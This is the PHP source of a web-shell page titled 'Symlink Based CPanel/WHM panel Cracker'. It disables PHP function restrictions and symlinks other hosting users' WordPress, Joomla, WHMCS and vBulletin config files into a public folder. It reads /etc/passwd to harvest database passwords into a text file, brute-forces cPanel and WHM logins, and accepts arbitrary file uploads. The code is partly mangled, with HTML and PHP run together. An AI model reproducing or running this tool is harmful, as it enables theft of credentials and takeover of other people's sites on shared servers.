$head = '</script>Symlink Based CPanel/WHM panel Cracker<title>Symlink Based CPanel/WHM panel Cracker</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><STYLE>body {font-family: Tahoma}tr {BORDER: dashed 1px #333;color: #FFF;}td {BORDER: dashed 1px #333;color: #FFF;}.table1 {BORDER: 0px Black;BACKGROUND-COLOR: Black;color: #FFF;}.td1 {BORDER: 0px;BORDER-COLOR: #333333;font: 7pt Verdana;color: Green;}.tr1 {BORDER: 0px;BORDER-COLOR: #333333;color: #FFF;}table {BORDER: dashed 1px #333;BORDER-COLOR: #333333;BACKGROUND-COLOR: Black;color: #FFF;}input {border : solid 3px ;border-color : #333;BACKGROUND-COLOR: white;font: 11pt Verdana;color: #333;}select {BORDER-RIGHT: Black 1px solid;BORDER-TOP: #DF0000 1px solid;BORDER-LEFT: #DF0000 1px solid;BORDER-BOTTOM: Black 1px solid;BORDER-color: #FFF;BACKGROUND-COLOR: Black;font: 8pt Verdana;color: Red;}submit {BORDER: buttonhighlight 2px outset;BACKGROUND-COLOR: Black;width: 30%;color: #FFF;}textarea {border : dashed 1px #333;BACKGROUND-COLOR: Black;font: Fixedsys bold;color: #999;}BODY {SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFFmargin: 1px;color: Red;background-color: Black;}.main {margin : -287px 0px 0px -490px;BORDER: dashed 1px #333;BORDER-COLOR: #333333;}.tt {background-color: Black;}A:link {COLOR: White; TEXT-DECORATION: none}A:visited {COLOR: White; TEXT-DECORATION: none}A:hover {color: Red; TEXT-DECORATION: none}A:active {color: Red; TEXT-DECORATION: none}</STYLE><script language=\'javascript\'>function hide_div(id){document.getElementById(id).style.display = \'none\';document.cookie=id+\'=0;\';}function show_div(id){document.getElementById(id).style.display = \'block\';document.cookie=id+\'=1;\';}function change_divst(id){if (document.getElementById(id).style.display == \'none\')show_div(id);elsehide_div(id);}</script>'; Symlink Based CPanel/WHM panel Cracker
<img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url" />echo $head ;echo '<table width="100%" cellspacing="0" cellpadding="0" class="tb1" ><tdwidth="100%" align="center" valign="top" rowspan="1"><fontcolor="red" face="arial"size="1">';<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="arial">if(isset($_POST['ini'])){$r=fopen('php.ini','w');$rr=" disable_functions=none ";fwrite($r,$rr);$link="<a href=php.ini><font color=white size=2 face=\"arial\"><u>link to php.ini file</u></font></a>";echo $link;}if(isset($_POST['usre'])){ } error_reporting(0);echo "<font color=red size=2 face=\"arial\">";if(isset($_POST['su'])){$dir=mkdir('BT',0777);$r = " Options all \n DirectoryIndex BT.html \n Require None \n Satisfy Any";$f = fopen('BT/.htaccess','w');fwrite($f,$r);$consym="<a href=BT/><font color=white size=3 face=\"arial\">Configuration files</font></a>";echo "
Folder Where Config Files has been Symlinked
<u><font color=red size=2 face=\"arial\">$consym</font></u>";$usr=explode("\n",$_POST['user']);foreach($usr as $uss ){$us=trim($uss);$r="BT/";symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');}}error_reporting(0);set_time_limit(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[1]);$ar=trim($ar1[0]);return $ar;}if(isset($_POST['sm'])){echo '<font color=green>OK++';$ffile=fopen('BT.txt','a+');$r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/BT/";$re=$r;$confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");$users=file("/etc/passwd");foreach($users as $user){$str=explode(":",$user);$usersss=$str[0];foreach($confi as $co){$uurl=$re.$usersss.$co;$uel=$uurl;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $uel);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');$result['EXE'] = curl_exec($ch);curl_close($ch);$uxl=$result['EXE'];if($uxl && preg_match('/table_prefix/i',$uxl)){echo "<div align=center><table width=60% ><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Wordpress </font>
"; echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");if(!empty($dbp))$pass=$dbp."\n";fwrite($ffile,$pass);}elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl)){echo "<div align=center><table width=60% ><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Whmcs </font>
";echo $dbp=entre2v2($uxl,"db_password = '","';");if(!empty($dbp))$pass=$dbp."\n";fwrite($ffile,$pass);}elseif($uxl && preg_match('/dbprefix/i',$uxl)){echo "<div align=center><table width=60% ><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Joomla </font>
";echo $db=entre2v2($uxl,"password = '","';");if(!empty($db))$pass=$db."\n";fwrite($ffile,$pass);}elseif($uxl && preg_match('/admincpdir/i',$uxl)){echo "<div align=center><table width=60% ><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is vbulletin </font>
";echo $db=entre2v2($uxl,"password'] = '","';");if(!empty($db))$pass=$db."\n";fwrite($ffile,$pass);}elseif($uxl && preg_match('/DB_DATABASE/i',$uxl)){echo "<div align=center><table width=60% ><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font>
";echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");if(!empty($db))$pass=$db."\n";fwrite($ffile,$pass);}elseif($uxl && preg_match('/dbpass/i',$uxl)){echo "<div align=center><table width=60% ><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font>
";echo $db=entre2v2($uxl,"dbpass = '","';");if(!empty($db))$pass=$db."\n";fwrite($ffile,$pass);}elseif($uxl && preg_match('/dbpass/i',$uxl)){echo "<div align=center><table width=60% ><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font>
";echo $db=entre2v2($uxl,"dbpass = '","';");if(!empty($db))$pass=$db."\n";fwrite($ffile,$pass);}elseif($uxl && preg_match('/dbpass/i',$uxl)){echo "<div align=center><table width=60% ><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font>
";echo $db=entre2v2($uxl,"dbpass = \"","\";");if(!empty($db))$pass=$db."\n";fwrite($ffile,$pass);}}}}}error_reporting(0);$connect_timeout=5;set_time_limit(0);$userl=$_POST['usernames'];$passl=$_POST['passwords'];$attack=$_POST['op'];$target = "localhost";if(isset($_POST['cpanelcracking'])){if($userl!=="" && $passl!==""){if($_POST["op"]=="cp"){$cracked=$_POST['crack'];@fopen($cracked,'a');echo "Attacking CPanel....please wait till the end of process \n";}elseif($_POST["op"]=="whm"){@fopen($cracked,'a');echo "Attacking WHM panel....please wait till the end of process";}function cpanel($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://$host:2082");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data = curl_exec($ch);if ( curl_errno($ch) == 0 ){echo "<table width=100% ><td align=center></font><font color=red size=2> Cracked </font><font color=white size=2> Username is </font><font color=green size=2> $user</font><font color=red size=2> & </font><font color=white size=2> Password is </font><font color=green size=2> $pass </font></font>
";}curl_close($ch);}$userlist=explode("\n",$userl);$passlist=explode("\n",$passl);if ($attack == "cp"){foreach ($userlist as $user) {echo "<div align=center><table width=80% ><td align=center><font color=red size=1>Attacking user $user </font>
";$finaluser = trim($user);foreach ($passlist as $password ) {$finalpass = trim($password);cpanel($target,$finaluser,$finalpass,$connect_timeout);}}}function whm($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://$host:2086");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data = curl_exec($ch);if ( curl_errno($ch) == 0 ){echo "<table width=100% ><td align=center></font><font color=red size=2> Cracked </font><font color=white size=2> Username is </font><font color=green size=2> $user</font><font color=red size=2> & </font><font color=white size=2> Password is </font><font color=green size=2> $pass </font></font>
";}curl_close($ch);}$userlist=explode("\n",$userl);$passlist=explode("\n",$passl);if ($attack == "whm"){foreach ($userlist as $user) {echo "<div align=center><table width=80% ><td align=center><font color=red size=1>user under attack is $user </font>
";$finaluser = trim($user);foreach ($passlist as $password ) {$finalpass = trim($password);whm($target,$finaluser,$finalpass,$connect_timeout);}}}}elseif($userl==""){echo "you have left userlist field empty";}elseif($passl==""){echo "please put passwords in paasword list field";}}echo '';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '
'; }else { echo 'Not uploaded !
'; }}